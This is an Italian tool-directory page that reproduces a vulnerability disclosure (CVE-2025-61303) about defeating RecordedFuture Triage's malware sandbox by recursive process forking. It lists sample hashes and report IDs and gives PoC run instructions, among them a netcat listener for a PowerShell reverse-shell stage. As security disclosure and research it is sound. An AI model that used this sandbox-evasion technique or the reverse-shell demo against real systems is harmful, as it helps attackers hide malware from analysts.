Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-61303 — Vulnerabilità Critica (9.8) - Il motore di analisi dinamica RecordedFuture Triage può fallire nel registrare comportamenti dannosi quando i campioni producono un fork di processi ricorsivi ad altissimo volume, causando report comportamentali inconsistenti o mancanti. | Kitploit
Strumenti/GitHubGitHub/egkritsis/cve-2025-61303
Analisi Dinamica (Sandboxing)Analisi delle VulnerabilitàExploitAnalisi MalwarePaper e RicercaApprendimento e Formazione
GitHubegkritsis/cve-2025-61303

CVE-2025-61303

Vulnerabilità Critica (9.8) - Il motore di analisi dinamica RecordedFuture Triage può fallire nel registrare comportamenti dannosi quando i campioni producono un fork di processi ricorsivi ad altissimo volume, causando report comportamentali inconsistenti o mancanti.

Vedi Repository
21110 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-61303 - RecordedFuture Triage: Negazione dell'Analisi tramite Forking Ricorsivo di Processi

Descrizione

RecordedFuture Triage Sandbox Windows 10 build 2004 e Windows 10 LTSC 2021 contiene una vulnerabilità critica nel proprio motore di analisi comportamentale di Windows che consente a un campione di malware inviato di eludere il rilevamento e causare una negazione dell'analisi. La vulnerabilità viene attivata quando un campione genera ricorsivamente un gran numero di processi figli, producendo un volume elevato di log ed esaurendo le risorse di sistema. Di conseguenza, comportamenti maliziosi chiave, inclusa l'esecuzione di PowerShell e l'attività di reverse shell, potrebbero non essere registrati o segnalati, fuorviando gli analisti e compromettendo l'integrità e la disponibilità dei risultati dell'analisi in sandbox.


Punteggio CVSS

CVSS v3.1: 9.8 (Critico)
Vettore: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H


Autori / Ricercatori

  • Evgenios Gkritsis — Dipartimento di Informatica, Università di Atene per l'Economia e il Commercio, Grecia
  • Constantinos Patsakis — Dipartimento di Informatica, Università del Pireo, Grecia
  • George Stergiopoulos — Dipartimento di Informatica, Università di Atene per l'Economia e il Commercio, Grecia

Dettagli

Il campione vathos_rev.exe (SHA256: 3c52178c27d2a0336f6286f6cf0a4a253a507273b1a19303edcacb39d2659a4b) dimostra una condizione di negazione dell'analisi nel motore di analisi comportamentale di Windows di RecordedFuture Triage.
Quando viene eseguito in configurazioni Windows 10, il campione genera ricorsivamente migliaia di processi figli, esaurendo le risorse di tracciamento dei processi e di logging. Di conseguenza, la sandbox riporta dati comportamentali minimi e non riesce a registrare le azioni maliziose chiave.


Ambiente Windows 10 v2004

  • Piattaforma: win10v2004-20250610-en
  • Architettura: x64
  • Tempo massimo kernel: 104s
  • Tempo massimo rete: 213s
  • Punteggio comportamentale riportato: 1/10
  • Firma rilevata: “Uso sospetto di WriteProcessMemory” (64 IoC)
  • Comportamento osservato:
    • Recursione continua del processo vathos_rev.exe
    • Nessuna esecuzione di PowerShell o attività di reverse-shell registrata
    • Traffico di rete limitato (solo richieste DNS e HTTP standard)
    • Nessun callback C2 o telemetria del payload catturata

Ambiente Windows 10 LTSC 2021

  • Piattaforma: win10ltsc2021-20250619-en
  • Architettura: x64
  • Tempo massimo kernel: 105s
  • Tempo massimo rete: 215s
  • Punteggio comportamentale riportato: 1/10
  • Firma rilevata: “Uso sospetto di WriteProcessMemory” (64 IoC)
  • Attività di processo osservata:
    • Recursione continua del processo vathos_rev.exe
    • Nessuna esecuzione di PowerShell o attività di reverse-shell registrata
    • Traffico di rete limitato (solo richieste DNS e HTTP standard)
    • Nessun callback C2 o telemetria del payload catturata

In entrambi gli ambienti sandbox Windows 10, la detonazione non è riuscita a catturare le fasi previste di esecuzione di PowerShell e reverse-shell nonostante il malware eseguisse questi comportamenti sull'host.

Il motore di analisi comportamentale della sandbox è stato saturato dalla creazione ricorsiva di processi, con conseguente telemetria troncata o mancante.

Ciò conferma una vulnerabilità di negazione dell'analisi: il motore comportamentale non riesce a segnalare attività maliziose in condizioni di alta ricorsione e volume di log, portando a falsi negativi e output forensi incompleti.

Riferimento del rapporto pubblico:
https://tria.ge/250822-qfystshk51


Impatto

Questa è una vulnerabilità di negazione dell'analisi in RecordedFuture Triage che può causare il fallimento del motore di analisi dinamica nel catturare o segnalare l'attività comportamentale. Lo sfruttamento consente agli avversari di bypassare il rilevamento comportamentale e produrre report di analisi incompleti o mancanti.

Impatti chiave

  • Elusione del rilevamento: Il comportamento malizioso potrebbe non essere registrato, facendo apparire le minacce come benigne.
  • Falsa fiducia: Analisi con punteggio basso e telemetria mancante possono fuorviare gli analisti.
  • Elusione riutilizzabile: La tecnica può essere incorporata in loader/dropper e riutilizzata in campagne.
  • Facilità di sfruttamento: Riproducibile senza competenze approfondite, aumentando il rischio di abuso di massa.

Conseguenze a valle

  • IoC mancati
  • Classificazione errata di minacce avanzate
  • Timeline forensi incomplete

Prodotti interessati

  • Prodotto: RecordedFuture Triage (Piattaforma di analisi dinamica)
  • Componente interessato: Motore di analisi comportamentale di Windows
  • Campione di malware: vathos_rev.exe
    • SHA256: 3c52178c27d2a0336f6286f6cf0a4a253a507273b1a19303edcacb39d2659a4b
    • MD5: dca2fc8f69f6493c7a9c1ce9a68b2454
    • SHA1: 9b4688ba4788e34bce47d91b0accc98d33dbf8d2
    • SHA512: 924e866dfce8abaee30f94bf78254777b6f7fd6a35d091402a984c233a8f0cbd104ebe34559037356697ae39613781ca90bd5e9f2b6542309090e806ec5f674b
    • Dimensione: 270 KB

Detonazioni vulnerabili osservate (Report pubblici Triage)

Ambiente Windows 10 LTSC 2021

  • ID Report: 250822-qfystshk51
  • Piattaforma: win10ltsc2021-20250619-en
  • Architettura: x64
  • Inviato: 2025-08-22 13:12 UTC
  • Segnalato: 2025-08-22 13:18 UTC

Ambiente Windows 10 Versione 2004

  • ID Report: 250822-qfystshk51
  • Piattaforma: win10v2004-20250610-en
  • Architettura: x64
  • Inviato: 2025-08-22 13:12 UTC
  • Segnalato: 2025-08-22 13:18 UTC

Nota: I dettagli della build del motore e della versione interna non sono esposti pubblicamente da RecordedFuture.
Tutte le osservazioni si basano su detonazioni pubbliche riproducibili dalla piattaforma Triage di RecordedFuture (invio 250822-qfystshk51).


Proof Of Concept (PoC)

Riepilogo (breve)

La demo fornita riproduce la condizione di negazione dell'analisi (DoA) generando un volume molto elevato di processi e attività runtime profondamente annidate. La demo genera molti processi figli ed esegue decrittazione XOR multi-round prima di una fase finale di reverse-shell PowerShell. Nelle immagini Triage Windows 10 vulnerabili, la fase finale del payload non viene registrata o viene troncata, mentre altre immagini (ad esempio Windows 11) catturano il comportamento completo.

Come eseguire

poc/vathos_demo.exe <IP> <PORT>

Avviare un listener (ad esempio nc -lvp 4444) sull'IP/porta specificata per osservare i tentativi di connessione. La demo genera un numero molto elevato di processi ed esegue decrittazione XOR multi-round, culminando in una fase di reverse-shell PowerShell. Nelle configurazioni Triage interessate, la fase finale del payload potrebbe non essere registrata nonostante il campione la esegua sull'host.

Figura 1 - Dashboard panoramica di Triage Figura 1 - Dashboard panoramica di Triage

Figura 2 - Report comportamentale Windows 10 v2004 (telemetria minima / esempio DoA) Figura 2 - Report comportamentale Windows 10 v2004 (telemetria minima / esempio DoA)

Scarica lo strumento